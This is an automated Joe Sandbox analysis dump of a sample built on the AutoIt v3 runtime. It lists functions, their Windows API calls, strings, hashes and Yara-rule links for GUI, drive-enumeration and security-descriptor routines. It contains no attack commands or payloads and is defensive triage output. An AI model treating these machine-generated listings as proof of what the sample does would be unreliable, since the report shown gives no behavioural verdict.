GetClientRect.USER32(00000000,?), ref: 00592D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00592D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D80
GlobalLock.KERNEL32(00000000), ref: 00592D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592D98
GlobalUnlock.KERNEL32(00000000), ref: 00592DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DA8
GlobalFree.KERNEL32(00000000), ref: 00592DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,005AFC38,00000000), ref: 00592DDB
GlobalFree.KERNEL32(00000000), ref: 00592DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00592E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00592E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0059303F

Strings

static, xrefs: 00592D3A, 00592E91
, xrefs: 00592FC5
AutoIt v3, xrefs: 00592CF2
DISPLAY, xrefs: 00592EA2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
Instruction ID: a658e8566bcbc5b811fbe4d2704be4992c5475ad60fac345de20c93da84dea2f
Opcode Fuzzy Hash: a0d8ee3343bf5e662cf8efd1b1dad136db9ec5ae20eea3d995f91820ea175789
Instruction Fuzzy Hash: 75027A71A00209AFDB14DF68CC89EAE7FB9FF49310F008558F915AB2A1DB74AD45DB60

Function 005A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 005A712F
GetSysColorBrush.USER32(0000000F), ref: 005A7160
GetSysColor.USER32(0000000F), ref: 005A716C
SetBkColor.GDI32(?,000000FF), ref: 005A7186
SelectObject.GDI32(?,?), ref: 005A7195
InflateRect.USER32(?,000000FF,000000FF), ref: 005A71C0
GetSysColor.USER32(00000010), ref: 005A71C8
CreateSolidBrush.GDI32(00000000), ref: 005A71CF
FrameRect.USER32(?,?,00000000), ref: 005A71DE
DeleteObject.GDI32(00000000), ref: 005A71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 005A7230
FillRect.USER32(?,?,?), ref: 005A7262
GetWindowLongW.USER32(?,000000F0), ref: 005A7284

Part of subcall function 005A73E8: GetSysColor.USER32(00000012), ref: 005A7421
Part of subcall function 005A73E8: SetTextColor.GDI32(?,?), ref: 005A7425
Part of subcall function 005A73E8: GetSysColorBrush.USER32(0000000F), ref: 005A743B
Part of subcall function 005A73E8: GetSysColor.USER32(0000000F), ref: 005A7446
Part of subcall function 005A73E8: GetSysColor.USER32(00000011), ref: 005A7463
Part of subcall function 005A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
Part of subcall function 005A73E8: SelectObject.GDI32(?,00000000), ref: 005A7482
Part of subcall function 005A73E8: SetBkColor.GDI32(?,00000000), ref: 005A748B
Part of subcall function 005A73E8: SelectObject.GDI32(?,?), ref: 005A7498
Part of subcall function 005A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
Part of subcall function 005A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
Part of subcall function 005A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 7d2662fc6c75d5dbd695689becbd05c487dc761a8db31f03dbda7c2543cb19fb
Instruction ID: 9e0bcbd9bb9c35c7f9045a8e5b9d3a3e4844c77660121f3b47190b4ba9668048
Opcode Fuzzy Hash: 7d2662fc6c75d5dbd695689becbd05c487dc761a8db31f03dbda7c2543cb19fb
Instruction Fuzzy Hash: 96A19C72508305AFDB009F60DC48A6FBFE9FF9E320F100A19FA62961A1D730E948DB51

Function 00528D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00528E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00566AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00566AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00566F43

Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5

SendMessageW.USER32(?,00001053), ref: 00566F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00566F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00566FB7

Strings

0, xrefs: 00566DCF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
Instruction ID: f4de8b26466931e39962bd73c3442262321286c3043d3a9156dd4324a2c4ea55
Opcode Fuzzy Hash: c86afaa39f83b6e2f73581394125333b95f84c4efadbc434a888d0b833933765
Instruction Fuzzy Hash: 0C129B30601651EFDB25CF14D888BBABFE9FF5A300F144569E485CB2A2CB32AC55DB91

Function 00592711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0059273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0059286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 005928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 005928B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00592900
GetClientRect.USER32(00000000,?), ref: 0059290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00592955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00592964
GetStockObject.GDI32(00000011), ref: 00592974
SelectObject.GDI32(00000000,00000000), ref: 00592978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00592988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00592991
DeleteDC.GDI32(00000000), ref: 0059299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 005929DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00592A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00592A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00592A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00592A77
GetStockObject.GDI32(00000011), ref: 00592A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00592A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00592A97

Strings

static, xrefs: 0059294F, 00592A71
msctls_progress32, xrefs: 00592A13
AutoIt v3, xrefs: 005928F8
DISPLAY, xrefs: 0059295A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
Instruction ID: ea1cfc400f18c441bae5644aa6780bcb876581a182681f117f3de12bcfcece12
Opcode Fuzzy Hash: 2bd84887d2d0ebc291479d75db7d456c73165498930e3a0e3cd3a44019db8e54
Instruction Fuzzy Hash: 30B14A71A00219BFEB14DFA8CC89EAE7BA9FB59710F008515F915EB290D770AD44CBA4

Function 00584ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00584AED
GetDriveTypeW.KERNEL32(?,005ACB68,?,\\.\,005ACC08), ref: 00584BCA
SetErrorMode.KERNEL32(00000000,005ACB68,?,\\.\,005ACC08), ref: 00584D36

Strings

Fibre, xrefs: 00584CAD
\\.\, xrefs: 00584B3F
USB, xrefs: 00584CB4
1394, xrefs: 00584C9F
iSCSI, xrefs: 00584CC2
FileBackedVirtual, xrefs: 00584CEC
Network, xrefs: 00584C02
ATAPI, xrefs: 00584C91
Removable, xrefs: 00584C10, 00584C15
PhysicalDrive, xrefs: 00584B76
SAS, xrefs: 00584CC9
Virtual, xrefs: 00584CE5
RAID, xrefs: 00584CBB
Unknown, xrefs: 00584BED, 00584C83
SSA, xrefs: 00584CA6
SATA, xrefs: 00584CD0
RAMDisk, xrefs: 00584BF4
ATA, xrefs: 00584C98
MMC, xrefs: 00584CDE
Fixed, xrefs: 00584C09
CDROM, xrefs: 00584BFB
SCSI, xrefs: 00584C8A
SSD, xrefs: 00584C4A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0f675184068f30a067ee6eb4d245cfc2c0f77a0779eb0a8264397a33c53efaf3
Instruction ID: a4fe4a10574a2f80bbe6cb3e0c7aae25122c1ee87098477094d33ddda477cca2
Opcode Fuzzy Hash: 0f675184068f30a067ee6eb4d245cfc2c0f77a0779eb0a8264397a33c53efaf3
Instruction Fuzzy Hash: 9F619F306052079BCB24FF28DA859A8BFB5BB44300B248817EC06BB391DB71ED42DF51

Function 005A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 005A7421
SetTextColor.GDI32(?,?), ref: 005A7425
GetSysColorBrush.USER32(0000000F), ref: 005A743B
GetSysColor.USER32(0000000F), ref: 005A7446
CreateSolidBrush.GDI32(?), ref: 005A744B
GetSysColor.USER32(00000011), ref: 005A7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 005A7471
SelectObject.GDI32(?,00000000), ref: 005A7482
SetBkColor.GDI32(?,00000000), ref: 005A748B
SelectObject.GDI32(?,?), ref: 005A7498
InflateRect.USER32(?,000000FF,000000FF), ref: 005A74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 005A74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 005A74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 005A7554
InflateRect.USER32(?,000000FD,000000FD), ref: 005A7572
DrawFocusRect.USER32(?,?), ref: 005A757D
GetSysColor.USER32(00000011), ref: 005A758E
SetTextColor.GDI32(?,00000000), ref: 005A7596
DrawTextW.USER32(?,005A70F5,000000FF,?,00000000), ref: 005A75A8
SelectObject.GDI32(?,?), ref: 005A75BF
DeleteObject.GDI32(?), ref: 005A75CA
SelectObject.GDI32(?,?), ref: 005A75D0
DeleteObject.GDI32(?), ref: 005A75D5
SetTextColor.GDI32(?,?), ref: 005A75DB
SetBkColor.GDI32(?,?), ref: 005A75E5

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 86f65d116e512241c141611f9c427f2bd52af713844a7c7dda0def17ccb5f4db
Instruction ID: fd6aa1b34001fde29dca1707c8de140ed363b044908c8989d770abc0267c3d0f
Opcode Fuzzy Hash: 86f65d116e512241c141611f9c427f2bd52af713844a7c7dda0def17ccb5f4db
Instruction Fuzzy Hash: 19614A72D04218AFDF019FA4DC49AAEBFB9FF0E320F114525F915AB2A1D7749940DB90

Function 005A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 005A1128
GetDesktopWindow.USER32 ref: 005A113D
GetWindowRect.USER32(00000000), ref: 005A1144
GetWindowLongW.USER32(?,000000F0), ref: 005A1199
DestroyWindow.USER32(?), ref: 005A11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005A11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 005A1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 005A1245
IsWindowVisible.USER32(00000000), ref: 005A12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 005A12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 005A12D0
GetWindowRect.USER32(00000000,?), ref: 005A12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 005A130E
GetMonitorInfoW.USER32(00000000,?), ref: 005A1328
CopyRect.USER32(?,?), ref: 005A133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 005A13AA

Strings

(, xrefs: 005A131B
tooltips_class32, xrefs: 005A11E6
0, xrefs: 005A10D3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
Instruction ID: 198b70755214fe71dde5ade3987a4bcd251b9b3215ad0fd46f9e56ff55373691
Opcode Fuzzy Hash: 47b56bf184305f637032142a3dcff30c7487bbed3e454ac0d3ea40623ecda33c
Instruction Fuzzy Hash: D9B18E71608741AFE704DF64C888BAEBFE5FF89350F008919F9999B261D731E844CB95

Function 005A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005A02E5
_wcslen.LIBCMT ref: 005A031F
_wcslen.LIBCMT ref: 005A0389
_wcslen.LIBCMT ref: 005A03F1
_wcslen.LIBCMT ref: 005A0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 005A04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 005A0504

Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD

Part of subcall function 0057223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00572258
Part of subcall function 0057223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0057228A

Strings

SELECTINVERT, xrefs: 005A057E
GETSUBITEMCOUNT, xrefs: 005A0384, 005A039F
DESELECT, xrefs: 005A059C
GETTEXT, xrefs: 005A03EC, 005A0407
ISSELECTED, xrefs: 005A04DD
FINDITEM, xrefs: 005A0627
SELECT, xrefs: 005A0548
GETSELECTED, xrefs: 005A05E1
SELECTCLEAR, xrefs: 005A052D
GETITEMCOUNT, xrefs: 005A0316, 005A0337
SELECTALL, xrefs: 005A0515
VIEWCHANGE, xrefs: 005A0675
GETSELECTEDCOUNT, xrefs: 005A0470, 005A048B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
Instruction ID: 984c2dfb9d2ae1228b1a1d95e6a528d2329a0da863f49a3b135384f9c8660dd6
Opcode Fuzzy Hash: 1fc21833fdea75421d92454de0b502d47e6d84d947715c964c0f38413dedc1f7
Instruction Fuzzy Hash: F2E1AE312282019FCB14DF28C45496EBBE2BFCA314F14496DF8969B3A1EB30ED45CB91

Function 00528891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00528968
GetSystemMetrics.USER32(00000007), ref: 00528970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0052899B
GetSystemMetrics.USER32(00000008), ref: 005289A3
GetSystemMetrics.USER32(00000004), ref: 005289C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005289F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00528A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00528A3C
GetClientRect.USER32(00000000,000000FF), ref: 00528A5A
GetStockObject.GDI32(00000011), ref: 00528A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00528A81

Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D

SetTimer.USER32(00000000,00000000,00000028,005290FC), ref: 00528AA8

Strings

AutoIt v3 GUI, xrefs: 00528A20

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: d5d970c422ca8c4c55f010799f74d9583bce0dcc5143c72287e03b715905b41b
Instruction ID: a49518bc8308b6110373f55120e4a08c53023691890e86ad0f41bf4d57921c7d
Opcode Fuzzy Hash: d5d970c422ca8c4c55f010799f74d9583bce0dcc5143c72287e03b715905b41b
Instruction Fuzzy Hash: AAB17971A0021A9FDB14DFA8DD89BAE7FB5FB49314F104229FA15EB2D0DB30A840DB55

Function 00570D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570E29
GetLengthSid.ADVAPI32(?), ref: 00570E40
GetAce.ADVAPI32(?,00000000,?), ref: 00570E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570E96
GetLengthSid.ADVAPI32(?), ref: 00570EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570EB5
HeapAlloc.KERNEL32(00000000), ref: 00570EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570EDD
CopySid.ADVAPI32(00000000), ref: 00570EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F6E
HeapFree.KERNEL32(00000000), ref: 00570F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F7E
HeapFree.KERNEL32(00000000), ref: 00570F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570F8E
HeapFree.KERNEL32(00000000), ref: 00570F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00570FA1
HeapFree.KERNEL32(00000000), ref: 00570FA8

Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
Instruction ID: 94147933d3616d56b47a737123f6dcf21e42dfbca505811c516e75b67ece4b5c
Opcode Fuzzy Hash: bea69d52af77047b49f5a6392c53582e99e784c421afece7c01ef645d96fe983
